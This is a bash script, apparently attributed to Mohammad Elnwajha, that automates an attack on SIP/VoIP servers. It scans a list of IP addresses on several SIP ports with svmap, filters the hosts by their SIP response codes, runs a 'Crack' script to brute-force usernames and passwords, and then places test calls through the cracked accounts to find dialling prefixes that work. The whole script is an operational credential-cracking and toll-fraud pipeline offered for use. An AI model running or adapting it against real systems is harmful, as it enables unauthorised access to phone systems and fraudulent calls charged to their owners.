#!/bin/bash

# Scan IPv4 range on port sip

echo -e "\nStart nslookup ...\n"

while read -r ip; do
	echo "Checking $ip";
	python svmap.py $ip -p5060 -v -t0.0 >> 1.port
    python svmap.py $ip -p6060 -v -t0.0 >> 2.port
    python svmap.py $ip -p6069 -v -t0.0 >> 3.port
    python svmap.py $ip -p5061 -v -t0.0 >> 4.port
    python svmap.py $ip -p6080 -v -t0.0 >> 5.port
    python svmap.py $ip -p5080 -v -t0.0 >> 6.port

cat *.port >> output


done < ip.txt

echo "we scaned Everythings"
sleep 1

echo -e "\nEnding scanning nslookup !\n"

# IP Extractor

echo -e "\nStart IP Extractor ...\n"

grep -Po "(\d+\.){3}\d+:?(\d?){7}" output >>cn1
grep -R ':' cn1 >cn2
awk '!a[$0]++' cn2 >IPS
sleep 1
rm *.port
rm cn1
rm cn2
rm cn1
sleep 1

echo -e "\nEnding IP Extractor !\n"

# SIP responses

echo -e "\nStart SIP responses ...\n"

perl run IPS
cat 401.pal 403.pal 404.pal  >> IPss
sleep 1

echo -e "\nEnding SIP responses !\n"

# SIP Crack user&password

echo -e "\nStart SIP Crack ...\n"

perl Crack 2000 2 IPss
sudo rm *.pal
sleep 1

echo -e "\nEnding SIP Crack !\n"

# Prefix Testing Call

echo -e "\nStart Prefix Testing ...\n"

perl call VOIPresult 500 30 | tee callfile1
grep -R 'MOHAMMAD' callfile1 >callfile2
cat callfile2 | awk '{print $2,$3,$4,$5,$6}' > QWEASD.txt
awk '!a[$0]++' QWEASD.txt >successCALL.txt
sudo rm callfile1
sudo rm callfile2
sudo rm QWEASD.txt
sleep 2

echo -e "\nEnding Prefix Testing !\n"

# Prefix Testing Prog

echo -e "\nStart Prefix Testing ...\n"

sed 's/$/ 1001 1001/' IPS > IPSprog

perl calling IPSprog 500 20 | tee callfile1
grep -R 'MOHAMMAD' callfile1 >callfile2
cat callfile2 | awk '{print $2,$3,$4,$5,$6}' > QWEASD.txt
awk '!a[$0]++' QWEASD.txt >successPROG.txt
sudo rm callfile1
sudo rm callfile2
sudo rm IPSprog
sudo rm QWEASD.txt
sleep 2

echo -e "\nEnding Prefix Testing Prog !\n"

echo -e "\nby Mohammad Elnwajha\n"

